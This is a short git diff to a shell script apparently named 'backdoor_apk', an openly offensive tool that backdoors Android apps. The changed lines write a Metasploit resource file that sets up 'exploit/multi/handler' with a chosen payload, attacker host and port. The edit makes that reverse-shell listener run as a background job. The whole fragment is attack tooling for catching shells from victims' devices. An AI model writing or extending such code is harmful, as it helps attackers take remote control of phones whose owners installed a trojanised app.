diff --git a/backdoor_apk b/backdoor_apk index 9bf19ea..bd5670c 100755 --- a/backdoor_apk +++ b/backdoor_apk @@ -601,6 +601,5 @@ echo "use exploit/multi/handler" > $svf echo "set PAYLOAD $payloads" >> $svf echo "set LHOST $yourip" >> $svf echo "set LPORT $yourport" >> $svf -echo "exploit" >> $svf -echo "exit -y" >> $svf +echo "exploit -j" >> $svf echo -e okegreen "Configuration file saved to $list/$save.rc"